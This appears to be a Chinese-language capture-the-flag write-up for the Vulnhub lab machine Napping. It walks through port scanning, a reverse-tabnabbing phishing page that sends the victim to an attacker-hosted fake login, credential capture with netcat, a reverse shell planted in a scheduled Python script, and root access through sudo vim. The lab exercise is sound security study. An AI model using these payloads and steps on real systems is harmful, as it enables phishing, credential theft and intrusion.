[Vulnhub] 靶場 NAPPING: 1.0.1
前期準備
靶機下載地址:https://www.vulnhub.com/entry/red-1,753/
kali:192.168.147.178
靶機:192.168.147.185
一、資訊收集
-
1、掃描同網段存活伺服器:
arp-scan -l
-
2、nmap進行埠掃描。
nmap -A -p 1-65535 192.168.11.137
nmap -sV -O 192.168.147.185
發現80埠開啟http服務,22埠開啟ssh服務。
-
3、訪問80埠,收集頁面資訊。
發現是個登陸介面,可以註冊,我們先註冊登陸。
完成註冊後,登陸進入介面,發現介面中間有個輸入連結的輸入框。
隨便輸入一個進行測試,提交之後發現可以點選here。
點選here以後,發現跳到hao123主頁。我們檢視頁面原始碼。
檢視原始碼,發現站點上的此特定 URL 連結功能容易受到
二、漏洞攻擊
-
1、TABNabbing釣魚利用
符合該漏洞利用條件,我們製作釣魚頁面,先將login登陸介面拷貝到本地。(注:為什麼是拷貝index.php ,可以利用御劍掃描該網站,或者kali dirb http://192.168.147.185
)
-
2、惡意介面的製作 sain.html
<!DOCTYPE html> <html> <body> <script> if(window.opener) window.opener.parent.location.replace('http://192.168.147.178:8000/text1.html'); if(window.opener != window) window.opener.parent.location.replace('http://192.168.11.178:8000/text1.html'); </script> </body> </html>
-
3、將製作的惡意介面和下載的index.php放到 /var/www/html,並且開啟 python3-http 服務,開 80 埠,和sain.html 中的埠區分開
開機8000埠監聽,nc -lvvp 8000 之後,在進行下列步驟。
稍等幾分鐘之後會獲取到監聽資訊,得到使用者名稱和密碼。
靶機中設定的隔幾分鐘就會用使用者登入,此時我們獲取了資料包
username=daniel
password=C@ughtm3napping123
三、ssh登陸
ssh [email protected] #ssh登陸daniel嘗試,發現登陸成功
檢視使用者資訊:
可以看到 daniel 是管理員組的一部分。
使用 find 我們可以查詢任何我們可以使用命令訪問的有趣檔案
find / -group administrators -type f 2>/dev/nul
進入目錄檢視query.py指令碼內容,發現對訪問本地服務狀態進行錄入,不管成功與否都寫入site_status.txt檔案。猜測是個定時指令碼。
檢視site_status.txt,發現可能是2分鐘執行一次該指令碼。
四、提權
-
我們發現指令碼在adrian使用者下定時執行,我們嘗試獲取adrian許可權。所以我們在 /dev/shm 目錄中建立一個反向 shell bash 指令碼:
在query.py中加入執行該指令碼程式碼。
在攻擊機監聽1234埠,等會得到反彈shell。
發現可以再沒有在沒有密碼的情況下以 root 身份執行 vim ,獲取root許可權,那就直接寫入vim shell
sudo /usr/bin/vim -c ':!/bin/sh'
sudo vim -c ':!/bin/sh'
兩個命令都可以獲取到root許可權。
參考了我關注的博主。